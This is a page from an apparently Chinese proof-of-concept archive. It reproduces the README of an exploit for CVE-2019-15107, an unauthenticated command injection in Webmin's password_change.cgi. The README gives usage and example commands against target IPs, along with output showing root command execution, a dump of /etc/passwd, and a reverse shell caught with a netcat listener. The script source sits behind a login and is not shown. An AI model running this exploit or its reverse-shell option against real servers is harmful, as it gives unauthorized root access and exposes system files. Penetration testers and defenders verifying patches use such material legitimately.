Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-15107 PoC — Webmin 命令操作系统命令注入漏洞

Source
https://github.com/NasrallahBaadi/CVE-2019-15107
Associated Vulnerability
Title:Webmin 命令操作系统命令注入漏洞 (CVE-2019-15107)
Description:An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
Description
CVE-2019-15107 Webmin unauthenticated RCE
Readme
# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution

This script is designed to exploit unauthenticated command execution vulnerability in Webmin 1.890. It allows you to execute arbitrary commands on a target Webmin server or to obtain a reverse shell.

## Usage

The exploit takes 5 arguments:

```bash
$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

```

The only required option is `-i` which is the ip address of the target.

Running the exploit with only `-i` will execute the command `id` at a target located on port `10000`

```bash
$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```

### Command execution

You can specify what command to run using the `-c` or `--command` options:

```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

```

### Reverse shell

You can also get a reverse shell by using the `--shell` option.

> You will be prompt to enter your IP address and the listening port:

```bash
$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```

```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 
```

### Proxy

By adding `-x` or `--proxy` option you can send the request though burp proxy at 127.0.0.1:8080

## References

<https://nvd.nist.gov/vuln/detail/cve-2019-15107>
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →